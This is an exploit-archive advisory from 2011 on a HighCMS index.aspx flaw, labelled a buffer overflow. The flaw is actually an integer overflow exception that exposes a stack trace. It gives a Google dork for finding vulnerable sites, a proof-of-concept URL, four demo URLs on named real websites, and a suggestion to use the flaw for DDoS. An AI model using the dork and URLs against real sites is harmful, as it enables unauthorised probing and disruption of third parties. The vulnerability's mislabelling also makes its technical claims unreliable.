HighCMS <= (index.aspx) Buffer Overflow Vulnerability



EKU-ID: 1225 CVE: OSVDB-ID:
Author: BHG Security Center Published: 2011-10-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


----------------------------------------------------------------
HighCMS <= (index.aspx) Buffer Overflow Vulnerability
----------------------------------------------------------------

# Exploit Title:HighCMS <= (index.aspx) Buffer Overflow Vulnerability
# Google Dork: inurl:index.aspx?siteid=1&pageid=
# Application Name: [HighCMS]
# Date: 2011-10-30
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: [ http://www.aryanic.com/products-highcms.html ]
# Vendor Response(s): They didn't respond to the emails.
# Version: [ 11.6 ]
# Impact : [ Low ]
# Tested on: [Windows Server 2003 /IIS 6.0]
# CVE : Webapps

+-----------------------+
| Overflow Exception    |
+-----------------------+

Description: You can use many of these vulnerabilities do Ddos attacks, including refref

# PoC(s):

http://[HOST]/index.aspx?siteid=1&pageid=[Overflow]

http://[HOST]/index.aspx?siteid=1&pageid=4141414141 <> True

# Demo(s):

http://www.mayadin.biz/index.aspx?siteid=1&pageid=4141414141

http://ielts-house.com/index.aspx?siteid=1&pageid=4141414141

http://www.persiangoldfish.com/index.aspx?siteid=1&pageid=414141414141

http://honarnews.org/index.aspx?siteid=1&pageid=4141414141

# Output Data:

[OverflowException: Arithmetic operation resulted in an overflow.]
   Microsoft.VisualBasic.CompilerServices.Conversions.ToInteger(String Value) +165
   highcms.index.page_select() +1272
   highcms.index.make_page() +2304
   highcms.index.Page_Load(Object , EventArgs ) +8725
   System.Web.UI.Control.OnLoad(EventArgs e) +132
   System.Web.UI.Control.LoadRecursive() +66
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2428


# Reference:
[1] For more information about this vulnerability (URL: http://msdn.microsoft.com/en-us/library/system.overflowexception.aspx)
[2] For more information about this vulnerability (URL: https://www.owasp.org/index.php/Buffer_Overflows)

# Important Notes:
- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.

# Greets To :

Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ 2MzRp

ArYaIeIrAn ~ Mikili ~ NoL1m1t ~ cmaxx ~ G3n3Rall ~ Mr.XHat ~ cmaxx

G3n3Rall ~ Mr.XHat ~  M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter

s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ  ./Persian Gulf

===========================================[End]=============================================